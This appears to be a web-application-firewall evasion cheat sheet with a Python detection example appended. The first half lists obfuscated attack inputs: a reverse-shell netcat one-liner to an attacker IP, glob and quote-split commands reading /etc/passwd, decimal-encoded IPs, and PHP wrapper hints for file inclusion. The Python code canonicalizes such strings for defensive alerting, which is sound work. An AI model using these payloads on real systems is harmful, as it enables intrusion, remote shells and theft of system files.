Web Application Firewall (WAF) Evasion Techniques #3
Uninitialized shell variables can be used to bypass web application firewalls (WAFs). Example: bypassing a filter to execute a reverse shell: nc$u -e /bin$u/bash$u <ip> <port>. If that does not work, try adding spaces before and after the variable (note the +'s; this example is also URL encoded): nc+$u++-e+/bin$u/bash$u <ip> <port> ($u here is an arbitrary attacker-picked variable name that would hopefully be uninitialized on the target, so it expands to nothing).
Bypass web filters by using bash wildcards: /???/?s/?cmd=%2f???%2f??t%20%2f???%2fp??s?? will bypass the filter and execute every command that matches the pattern, such as /bin/cat /etc/apt and /bin/cat /etc/passwd.
Injecting IPs when . is disallowed: convert the dotted-decimal format to its decimal value (ip2dh). The decimal form is still understood by most programs and languages and avoids the . character in filtered HTTP requests: 127.0.0.1 = 2130706433
LFI / RFI by Bypassing Filters Using Wrappers
From PayloadsAllTheThings: php://filter/ has multiple ways to bypass PHP input filters; these can be chained with | or /. Other wrappers to try: zip, data, expect, input, phar, and many more!
Standard: /bin/nc 127.0.0.1 1337
Evasion: /???/n? 2130706433 1337
Used chars: / ? n [0-9]
Standard: /bin/cat /etc/passwd
Evasion: /???/??t /???/??ss??
Used chars: / ? t s
$ /bin/cat /etc/passwd
$ /bin/cat /e'tc'/pa'ss'wd
$ /bin/c'at' /e'tc'/pa'ss'wd
$ /b'i'n/c'a't /e't'c/p'a's's'w'd'
A backslash escape (\) can be used instead of ' as well.
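Taken together, the tricks on this page (unset variables, quote splitting and backslash escapes, ? globbing, decimal-form IPs and URL encoding) all defeat a filter that matches the raw request instead of what the shell would actually run. The Python below is an added example, not code from the original page: it canonicalizes a captured command string the way the shell would interpret it, then expands any remaining ? and * tokens against a constructed list of sensitive paths, so a detection rule sees /bin/cat /etc/passwd whichever of the above forms was submitted. WATCHED_PATHS, the sample strings and all function names are assumptions made for this demo.

```python
import re
from ipaddress import IPv4Address
from urllib.parse import unquote_plus

# Constructed for this demo: paths a WAF rule set would want to alert on.
WATCHED_PATHS = ["/bin/cat", "/bin/nc", "/bin/bash", "/etc/passwd", "/etc/shadow"]

QUOTE_PAIR = re.compile(r"'([^'$`\\]*)'")                  # c'at' -> cat
SHELL_VAR = re.compile(r"\$\{?[A-Za-z_][A-Za-z0-9_]*\}?")  # $u or ${u}
INT_IP = re.compile(r"(?<![\w.])(\d{8,10})(?![\w.])")      # e.g. 2130706433

def int_to_dotted(token: str) -> str:
    """Turn a decimal-form IPv4 (1.0.0.0 and above) back into dotted form; leave ports alone."""
    n = int(token)
    return str(IPv4Address(n)) if 0x01000000 <= n <= 0xFFFFFFFF else token

def glob_to_regex(pattern: str) -> re.Pattern:
    """Shell-style glob: '?' is one non-slash char, '*' is any run of non-slash chars."""
    parts = []
    for ch in pattern:
        parts.append("[^/]" if ch == "?" else "[^/]*" if ch == "*" else re.escape(ch))
    return re.compile("^" + "".join(parts) + "$")

def canonicalize(cmd: str) -> str:
    """Undo the request-level tricks so the rule sees what the shell would run."""
    s = unquote_plus(cmd)                    # %2f -> /, + -> space
    s = QUOTE_PAIR.sub(r"\1", s)             # adjacent quoted fragments concatenate
    s = re.sub(r"\\(.)", r"\1", s)           # an unquoted \c is just c
    s = SHELL_VAR.sub("", s)                 # an unset $u expands to nothing
    return INT_IP.sub(lambda m: int_to_dotted(m.group(1)), s)

def watched_hits(cmd: str) -> list:
    """Return the watched paths a command references, expanding ? and * against the list."""
    hits = []
    for tok in canonicalize(cmd).split():
        if "?" in tok or "*" in tok:
            rx = glob_to_regex(tok)
            hits.extend(p for p in WATCHED_PATHS if rx.match(p))
        elif tok in WATCHED_PATHS:
            hits.append(tok)
    return hits

if __name__ == "__main__":
    # Constructed samples modelled on the evasion forms listed above.
    for sample in ["/b'i'n/c'a't /e't'c/p'a's's'w'd'",
                   "nc+$u++-e+/bin$u/bash$u+2130706433+1337",
                   "%2f???%2f??t%20%2f???%2fp??s??"]:
        print(repr(canonicalize(sample)), "->", watched_hits(sample))
```

The glob step deliberately over-approximates: it reports every watched path a pattern could expand to, which is what you want for alerting, not for reproducing the exact command the target's filesystem would select.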